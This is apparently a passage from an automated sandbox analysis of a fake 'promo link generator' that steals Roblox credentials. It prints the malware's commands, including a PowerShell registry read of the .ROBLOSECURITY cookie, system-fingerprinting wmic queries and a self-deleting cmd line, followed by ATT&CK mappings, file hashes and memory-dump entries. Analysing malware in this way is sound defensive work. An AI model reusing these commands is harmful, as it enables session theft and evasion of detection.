  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3104
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5852
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:3532
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4432
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2408
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe" && pause
  2⤵
  PID:5360
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:4428

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3308

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:6096

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Promo link generator.exe.log

Filesize
1KB

MD5
5f36c205799cb2f8966c7d5130cea05c

SHA1
614993e3437ff9363c3eb698d7dba379a453dd6e

SHA256
8eaaf40fe7570c8fa593702f38fee2f54538ba6a77d7c54005e8d1f150f5180c

SHA512
7053cac09d2e71675771bae4ac25f1a47f96be662f6bb2aab24668ed4c1809fb1261b2d6465202c09bd0310bf875361a815db6dda6006dcfbbb5fb3c50c5927b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-2-1.152.4952.1.odl

Filesize
706B

MD5
c286f16dc3e51694fec01a7564ef7c3f

SHA1
544c15e752d7ebd7f047859f3c3b62883b14796f

SHA256
3448eb1fb05d4c2eb420a1965e23750843c2a8e73db06a013da55e090dec6f8b

SHA512
e157ca6658244bd32ac1ec8227962213e15bcfdfc57b776394cf6c22783c91508ff84f29c47ae6053b03132ec7ebf9478ab0beb03dbdd4e4d709d7780e30bfd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d37543cc11da7ec4c5b5649f82fa0d21

SHA1
ab325e6aef004cd600bc241f6981f5ebb777c4f7

SHA256
6d727700914f414aef4400fa28047f3316daa579519141f250913224bbe17149

SHA512
e906f59bab4995d71febce7144ae6ff92ecef4d129edb5bebb5a38c1816b8accee40c1bf3e7443ac63d97d77165118d2d92d30ef46f5861135fdde6406e8dc7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
45741c307af2576c6437c5fdb24ef9ce

SHA1
a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf

SHA256
7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2

SHA512
39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f29ff8b1e0f396a194a6782749830b8e

SHA1
2f8999b0eb2a20e591cf9a638c9fa84ddf4a1f69

SHA256
5bfd4968395fefaac3941c08fa11e86dfde1072137d9290aee3888f2a5d92d3f

SHA512
0689d665f2a7c9007c5dc4c14a53d5566d315d05d476bee82d64d02d40e3ffddca2b36419c76a8f7b7979958a62a7a93c939d1ed72fa7a844841ed06741b9e19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6ca67a1a64ff4dd3f09a2393fccba8fa

SHA1
906350e7db31efc71679bbdbbcf1133aa2d31c1d

SHA256
6bc103c2e75b013034c77bb204ccbe43c365e9b6cb1697b9b5a1e20dda43427e

SHA512
4d1d3d52107b2eb2faf6918d0559a08acbe89b6a889f6300c55742d91f596a6764c637fc386c80ecbc434d0496ee83f243054c66b9eeb7adef4b2093e932b066

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6bddc96a32b9ed8fc70b141ccf4a39b2

SHA1
0f33c0699da40a5eadcec646791cf21cdb0dd7c6

SHA256
cb3853abe77eb0da8a1caccb49e97a573b6f35570722eb759116a645d724c132

SHA512
e41f1597b4129b759e4199db195df1c24e47cc47dc9850fab2d48e44bc3d37dc3658fbfbb62332a0b93c552587d7fab09de1634f605faa2209b8470c2a6eaca6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e8ad350bb24c7ab38efd0ef0553239c7

SHA1
887c19e4c11de19854458e26a1ed05b67a75bf29

SHA256
5cf85b38cbbf1a064a4f8001a0ec031993d44e46b8e65d713785c84916cb8ffd

SHA512
74fef147e98b8b576712c212174a7793deb619d54c7ac7956e38ed4e09202f0c93ae4ec9e89cd4d0ac79c481d30c5c3fc5a3d042537c74d7bffda1f8453aef6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9db2bc0a0bdfa296036c380393d879e6

SHA1
671288bb74f568effac2199c9213cf7e23a31ef9

SHA256
cce5cc392ad9a82edd35129076da6bb2c3ebe85e158efef8ee7740e9e722c678

SHA512
a1331966d5669c465ccbfbb588d8e09d295aba56be1e0bc895966da28916bdfb2e3333e24f48a54c68f3c3af0f78ec70cea1e07ec2e2647e154d7dfc4d412fc7

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
e0318545925262ee25623937bc30f43f

SHA1
dcd7b4f9513e205d046fcc3c42bce17f043851d4

SHA256
2233a96a9ee22402cbbc28f09a606e9856e3a5e3a9b5aa005a773481bd520b4e

SHA512
5a34b9e05e09e65775775f054f47e1f25b2246cffa6e18dc29521957512cbd415c184296664ce4ee48f3fc0be50ce4647bb6a1a5297214c8db7a6f912306b313

Download Submit
C:\Users\Admin\AppData\Local\Temp\AgDiyyYHIpPRawK

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\WNO7CwjJHjCwaGW

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4p4cjnjw.yei.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jT3kC2cr7A28uOD

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\t4ZXQvtKGdyQabi

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
6ca665c614cfa1e1e982527aefe50ec9

SHA1
e72caa6140d69232e4b3a1cf2f29f41caca5f344

SHA256
cc4a325ec030ee97805f7ce3c79271f215605ae7b90d30c8e3048f53619137d9

SHA512
de63e67e49ccc09ee10ea6488ad70d27b13ca9a62b4aa49f9498b2de3469a3bafc87cb9ec676a56d1b3d94162dafb5a38d36496d137aba8fc6c4243c740f6ec2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\datareporting\glean\pending_pings\b1019539-568a-49ad-affa-56b76dc574fe

Filesize
11KB

MD5
90455f406e244c9a486f6a0aac2da573

SHA1
f8c347ab1e48de5646d6c5a1528d9ba1f895dce3

SHA256
f115baf909ec690e4923c32160445928ee646277f596be21ee0bcd6e848fd2c3

SHA512
ba26f4b80e34328fddab01bf6835ed1a3eeebe0bd97115f27f1f98d526ae4e20ed12700dc96e999c3b73d1a235a7a52fcc9342f7b69cd3b61b09d7e2ef9181f3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\datareporting\glean\pending_pings\d5881941-9499-4b90-9655-79070fb075e8

Filesize
746B

MD5
69d446f267d7095094e27a57b128d906

SHA1
cc1cad9d90f5bc53a57b19d14583ab8083a92f6f

SHA256
d8b705d0c9ca1dfaccfe1bb45f9dc18dc6793891fedde1d45ea87291b7199019

SHA512
320f776f985667f8173b59959356e82defda306b758c87c04d3b8246946f3a77d23c24dc23ee9deb649122aceaaa06a13a6c5b5c7a81e257d4300bb284988efb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\prefs-1.js

Filesize
6KB

MD5
d702f36aa53a1586ff6fa91098352ceb

SHA1
6172ccfe938af757b9ed534ccd488ae8d497d21c

SHA256
cbcb7a3ee2585b61b76a59b4eb4972adcdf8d8735ce7d1cab456aa0712e6b8e9

SHA512
284e232704d32a24347a884cce01bb5df1edc5a7ebe609b4bf67cc9601acba8990f139af18e1984590d4b52d42678a8d6686af2b6c4f0f5946a3880997f1806d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\prefs-1.js

Filesize
6KB

MD5
c7dec541d0beba52e8772d2262771fb9

SHA1
b38c5dcd7bcf4ea154f4687edb6e9319c2ba71bc

SHA256
7bfb0d086e3c8a324fde5fb88e5436c21a76484e6ba00b171b3f1ea41d4ef6fa

SHA512
6f800413210c6a5c9111d60f054f01796ca7aa3e9ea5cff3c66ba0ea858b8a4884b0e25c3e0a921ef4e35964b087df1dbc5eb20f823ecf5ff7c06f60470b127f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\prefs.js

Filesize
6KB

MD5
252c97c96a7df77d1ce8ad62eee60fcc

SHA1
cfa1fff03ed844123a5bf195505dc6a1bfb01cb5

SHA256
2dfdda5c8c0602789ef7cbd9f7edbc4015b8c3ec8cd6344ed0b1ca3a5b25f072

SHA512
5b69c551f78a8a7823f6d0fd88ed083a497519b3a2c2dd8ccfb1e958334781ba96b59efd0957c21fa63165fe3e5e8131b768eefa5d2582aa54200a70be2907b6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\sessionCheckpoints.json.tmp

Filesize
259B

MD5
e6c20f53d6714067f2b49d0e9ba8030e

SHA1
f516dc1084cdd8302b3e7f7167b905e603b6f04f

SHA256
50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092

SHA512
462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
6122cfe9016db82fe8716ffb47eab8f8

SHA1
2ab5521c2cd168ad7542ead2fb1bb44a1d1e209e

SHA256
5c24f70901043d481de2e819dbfe6965d4b3aced889ebbf104fd845810bb2625

SHA512
1b187a4f2bd6857a4f3741fe8cbdee2c707f28073c77aa8a83d1829819a30c6c4c273ac41936fdd49552533f4b455eb2b005a20f45efce2e4481db7dea854be9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
a2a97729b6f387662442e00adb9068f7

SHA1
5bbf3e19fa86e1c4d2c13858aa58b9adc4edb9e2

SHA256
d77aec0b62448004fb4ebaf8271026604f95f9d5544c09e486dc2064e72a9efe

SHA512
49f7daf0ad28f08f3738ff7ab42ed5de30adb1980b7d2bd74bd9e4e7e79294cb1e94dd528455dcc9e7fb117875db9ac45a20fa2932b6004bcbb993e4f171d83b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
eceed859a12d0d2425324d6c908c6222

SHA1
8f46029abbbe772529a392105ee04d0275c02fd5

SHA256
ae2930e729aba93d943c4c1b4edd50c4108025dc07b91c6275ec2e3365ed773e

SHA512
6ae95a74f824e54bebfe63601c7d32e6b4d349db2b8a2663f4943df5c2a62fe337d3a638bfe1865dae428e75c6dd5dd174eef524d4cd13aa86d1e666e23ccfc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
532355f022e91fa86be97dc302c2777f

SHA1
b1f70205cabef4c2094348d405ad0e82e773ca0d

SHA256
0dfc94b8f020736bb58ae32701e010744f447312cca1351e1588e83ce71c0376

SHA512
aa05ecc76808b291365c79a6df73c0d64f232810ee342977739005c50d69058fec871bc16536f2b3ed141376c4423d09e91a412dfc08e3044a8bba04db120be5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
4332e4fc3d8ff7249969259185026f76

SHA1
47adcc0f55da98639e8b0fc968b44787ca69d235

SHA256
6600e1e53443ca4f7df8823c12cdbbca152408368b39d0e70aa2ebd624c0e538

SHA512
4f476f9bb78448e2a608e85b3d2435d3fdabbe8dc5ec43262a5fd77fd88dfe9d72ec6d89243109198ef49188dbc5683a342daf5e452f687b05d2655ca8592d53

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\sessionstore.jsonlz4

Filesize
5KB

MD5
598133a8368b48d88d11d656048aeb1a

SHA1
c2ebd662a75f016a503f342d76d086a07dbfb295

SHA256
6fbd66b3fe659589da000c9615f93e8b4794eb1a4236e593a5c2e9bc5628de28

SHA512
f66a236e4b789673264015867aa573e40aaa9f115a9874d601235cfaf3982858f476d68012cd503fdd4251fc6f5bea87394235ad27c97f4a74162c368b1d54a1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nx9wxjen.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
184KB

MD5
b07b7b8cdaae2c65d5626929a37b1e43

SHA1
30d6d8c79da5d955df4b1bb3e7bd5f68229d89c0

SHA256
8017f0fa6d2c74303f914340acad22ed5277fbd19d3ca9b9caca97c1d8bf4651

SHA512
e45d5e9d583772986b5c294241d09f467c82d1dae18d84dbe6c82f300c10523e275e99d1d2ec454a1818b8159b1796ff59b1ba888c096c12d45f00a44c7aba26

Download Submit
C:\Users\Admin\Downloads\Amruus promo link generator.3CF04_wS.rar.part

Filesize
16KB

MD5
b784ebcd7398568f2aa2509db35ec094

SHA1
620c9819eb4c4e5e239456cb2857d6a27a261072

SHA256
8cda79c5f617a830379c2ed0aebb4aa62a07e6b7c1ce42dd7600615332a5fe14

SHA512
c88fea3c6632d8757d882f9db7376050d441b24268393977ffec9553a1db5f383de5ac7b70557bb5d98061b7997db00073fc85170871ff9b564fdb670f81c48a

Download Submit
C:\Users\Admin\Downloads\Amruus promo link generator.rar

Filesize
79KB

MD5
0b25d0cf701d9c68ae40085c1afe2e3d

SHA1
0266c00fdcddc3e2f835cfb4109dffe1e7cf32c7

SHA256
8f0352553ab0acb32642074579db93344be53f54c700ee70bef3335db09c6529

SHA512
cb797620225ab96d36f58dd50570e00a71909ad68d5080ce5d85e0e0b8b85ea38aba4487b434973d8c28b61c5a3914f8e7779c488a67f4b3a9d80bd95fcf0b6a

Download Submit
C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe

Filesize
228KB

MD5
4e711e7231a67ebf4278a6ba9e2a1f98

SHA1
9bc200a14d089e0fe869674ee5f4219e86dc3009

SHA256
cfb4919168697ab5bfaa045cbf2c647aa55c1ffc8f5109acf90f2e90af14f40a

SHA512
38ac5f01c19304431f1b862172fd0ed7b67fd8926c94e289a7a9b06a6772b02c7708f9ebeb3263269721d379dede458bd29d16fd6eb81eb500d85b202707ec0f

Download Submit
C:\Users\Admin\Downloads\Amruus promo link generator\links.txt

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/1652-21-0x00000225DA890000-0x00000225DA8A0000-memory.dmp

Filesize
64KB

Download
memory/1652-103-0x00000225DA890000-0x00000225DA8A0000-memory.dmp

Filesize
64KB

Download
memory/1652-34-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/1652-35-0x00000225DA890000-0x00000225DA8A0000-memory.dmp

Filesize
64KB

Download
memory/1652-22-0x00000225DA890000-0x00000225DA8A0000-memory.dmp

Filesize
64KB

Download
memory/1652-20-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2136-97-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2136-95-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2272-66-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2272-78-0x0000012BFF080000-0x0000012BFF090000-memory.dmp

Filesize
64KB

Download
memory/2272-80-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2272-67-0x0000012BFF080000-0x0000012BFF090000-memory.dmp

Filesize
64KB

Download
memory/2272-68-0x0000012BFF080000-0x0000012BFF090000-memory.dmp

Filesize
64KB

Download
memory/2376-411-0x00000250EB150000-0x00000250EB160000-memory.dmp

Filesize
64KB

Download
memory/2376-412-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/2376-406-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/2376-408-0x00000250EB150000-0x00000250EB160000-memory.dmp

Filesize
64KB

Download
memory/2812-2-0x00000217F4640000-0x00000217F4650000-memory.dmp

Filesize
64KB

Download
memory/2812-82-0x00000217F4540000-0x00000217F454A000-memory.dmp

Filesize
40KB

Download
memory/2812-102-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2812-33-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2812-39-0x00000217F45E0000-0x00000217F45FE000-memory.dmp

Filesize
120KB

Download
memory/2812-0-0x00000217F2720000-0x00000217F2760000-memory.dmp

Filesize
256KB

Download
memory/2812-38-0x00000217F4570000-0x00000217F45C0000-memory.dmp

Filesize
320KB

Download
memory/2812-1-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/2812-37-0x00000217F4650000-0x00000217F46C6000-memory.dmp

Filesize
472KB

Download
memory/2812-83-0x00000217F4600000-0x00000217F4612000-memory.dmp

Filesize
72KB

Download
memory/3020-41-0x0000023C18650000-0x0000023C18660000-memory.dmp

Filesize
64KB

Download
memory/3020-40-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/3020-42-0x0000023C18650000-0x0000023C18660000-memory.dmp

Filesize
64KB

Download
memory/3020-65-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/4068-461-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/4068-472-0x00000260B9220000-0x00000260B9230000-memory.dmp

Filesize
64KB

Download
memory/4068-390-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/4068-391-0x000001AF22C20000-0x000001AF22C30000-memory.dmp

Filesize
64KB

Download
memory/4068-392-0x000001AF22C20000-0x000001AF22C30000-memory.dmp

Filesize
64KB

Download
memory/4068-394-0x000001AF22C20000-0x000001AF22C30000-memory.dmp

Filesize
64KB

Download
memory/4068-395-0x000001AF22C20000-0x000001AF22C30000-memory.dmp

Filesize
64KB

Download
memory/4068-397-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/4068-475-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/4068-470-0x00000260B9220000-0x00000260B9230000-memory.dmp

Filesize
64KB

Download
memory/4728-13-0x0000021714F80000-0x0000021714F90000-memory.dmp

Filesize
64KB

Download
memory/4728-8-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/4728-18-0x00007FF910900000-0x00007FF9113C2000-memory.dmp

Filesize
10.8MB

Download
memory/4728-15-0x0000021714F80000-0x0000021714F90000-memory.dmp

Filesize
64KB

Download
memory/4728-14-0x0000021714F80000-0x0000021714F90000-memory.dmp

Filesize
64KB

Download
memory/4728-9-0x0000021714F20000-0x0000021714F42000-memory.dmp

Filesize
136KB

Download
memory/4864-428-0x0000017927C50000-0x0000017927C60000-memory.dmp

Filesize
64KB

Download
memory/4864-429-0x0000017927C50000-0x0000017927C60000-memory.dmp

Filesize
64KB

Download
memory/4864-427-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/4864-440-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/4872-496-0x000002259ACF0000-0x000002259AD00000-memory.dmp

Filesize
64KB

Download
memory/4872-495-0x00007FF90ED80000-0x00007FF90F842000-memory.dmp

Filesize
10.8MB

Download
memory/4972-509-0x00007FF90ED80000-0x00007FF90F842000-memory.dmp

Filesize
10.8MB

Download
memory/4972-507-0x0000021A2C270000-0x0000021A2C280000-memory.dmp

Filesize
64KB

Download
memory/4972-506-0x00007FF90ED80000-0x00007FF90F842000-memory.dmp

Filesize
10.8MB

Download
memory/5856-454-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/5856-452-0x0000025E6A7E0000-0x0000025E6A7F0000-memory.dmp

Filesize
64KB

Download
memory/5856-451-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/6004-479-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/6004-441-0x00000149E9C70000-0x00000149E9C80000-memory.dmp

Filesize
64KB

Download
memory/6004-410-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download
memory/6004-381-0x00000149E9C70000-0x00000149E9C80000-memory.dmp

Filesize
64KB

Download
memory/6004-380-0x00007FF90EFC0000-0x00007FF90FA82000-memory.dmp

Filesize
10.8MB

Download